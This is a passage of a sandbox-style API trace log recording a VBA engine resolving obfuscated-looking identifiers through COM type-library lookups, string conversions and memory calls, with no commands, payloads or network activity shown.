ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0070.012] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb26ee | out: _Dst=0x144ec0) returned 0x0 [0070.012] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FxAXBZB", lHashVal=0x109024, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb271a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FxAXBZB") returned 8 [0070.012] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FxAXBZB", lHashVal=0x109024, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb271a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FxAXBZB") returned 8 [0070.012] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FxAXBZB", lHashVal=0x109024, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FxAXBZB") returned 0x109024 [0070.012] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="FxAXBZB" | out: _Dst="FxAXBZB") returned 0x0 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="FxAXBZB") returned 8 [0070.012] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.012] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FxAXBZB", lHashVal=0x109024, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.012] IUnknown:Release (This=0x665ba50) returned 0xf [0070.012] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.012] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FxAXBZB", lHashVal=0x109024, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.012] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.013] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.013] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FxAXBZB", lHashVal=0x109024, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.013] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.013] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.013] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FxAXBZB", lHashVal=0x109024, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.013] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb271a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FxAXBZB") returned 8 [0070.013] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FxAXBZB", lHashVal=0x109024, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.013] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.013] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb271a | out: _Dst=0x68767a0) returned 0x0 [0070.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FxAXBZB") returned 0x1093a8 [0070.013] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_FxAXBZB" | out: _Dst="_B_var_FxAXBZB") returned 0x0 [0070.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_FxAXBZB") returned 15 [0070.013] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.013] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FxAXBZB", lHashVal=0x1093a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.013] IUnknown:Release (This=0x665ba50) returned 0xf [0070.013] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.013] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FxAXBZB", lHashVal=0x1093a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.013] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.013] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.013] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FxAXBZB", lHashVal=0x1093a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.013] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.013] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.013] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FxAXBZB", lHashVal=0x1093a8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.013] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.013] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.013] IUnknown:Release (This=0x665ba50) returned 0xf [0070.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1c0e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_FxAXBZB") returned 15 [0070.014] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FxAXBZB", lHashVal=0x1093a8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x42005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x42005800000000, pDummy=0x0) returned 0x0 [0070.014] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb271a | out: _Dst=0x144ec0) returned 0x0 [0070.014] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0070.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0070.014] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.014] IUnknown:Release (This=0x665ba50) returned 0xf [0070.014] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.014] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.014] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.014] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.014] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0070.014] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.014] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.014] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.014] IUnknown:Release (This=0x665ba50) returned 0xf [0070.014] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.014] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.014] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.014] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0070.014] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0070.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0070.015] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.015] IUnknown:Release (This=0x665ba50) returned 0xf [0070.015] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.015] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.015] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0070.015] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.015] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.015] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.015] IUnknown:Release (This=0x665ba50) returned 0xf [0070.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.015] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0070.015] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0070.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0070.016] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.016] IUnknown:Release (This=0x665ba50) returned 0xf [0070.016] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.016] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.016] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.016] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.016] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0070.016] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.016] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.016] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.016] IUnknown:Release (This=0x665ba50) returned 0xf [0070.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.016] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0070.016] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0070.016] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.016] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.016] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.016] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.016] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.016] IUnknown:Release (This=0x665ba50) returned 0xf [0070.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.017] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0070.017] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0070.017] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.017] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.017] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.017] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.017] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.017] IUnknown:Release (This=0x665ba50) returned 0xf [0070.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2676, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAU_B") returned 7 [0070.017] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fAAU_B", lHashVal=0x10370b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2676, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAU_B") returned 7 [0070.017] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fAAU_B", lHashVal=0x10370b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2676, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAU_B") returned 7 [0070.017] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fAAU_B", lHashVal=0x10370b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.018] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAAU_B") returned 0x10370b [0070.018] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="fAAU_B" | out: _Dst="fAAU_B") returned 0x0 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="fAAU_B") returned 7 [0070.018] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.018] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fAAU_B", lHashVal=0x10370b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.018] IUnknown:Release (This=0x665ba50) returned 0xf [0070.018] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.018] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fAAU_B", lHashVal=0x10370b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.018] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.018] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.018] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fAAU_B", lHashVal=0x10370b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.018] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.018] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.018] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fAAU_B", lHashVal=0x10370b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.018] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2676, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="fAAU_B") returned 7 [0070.018] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fAAU_B", lHashVal=0x10370b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.018] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0070.018] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb2676 | out: _Dst=0x68767a0) returned 0x0 [0070.018] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fAAU_B") returned 0x10b1b4 [0070.018] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_fAAU_B" | out: _Dst="_B_var_fAAU_B") returned 0x0 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_fAAU_B") returned 14 [0070.018] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.018] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fAAU_B", lHashVal=0x10b1b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.018] IUnknown:Release (This=0x665ba50) returned 0xf [0070.018] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.019] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fAAU_B", lHashVal=0x10b1b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.019] 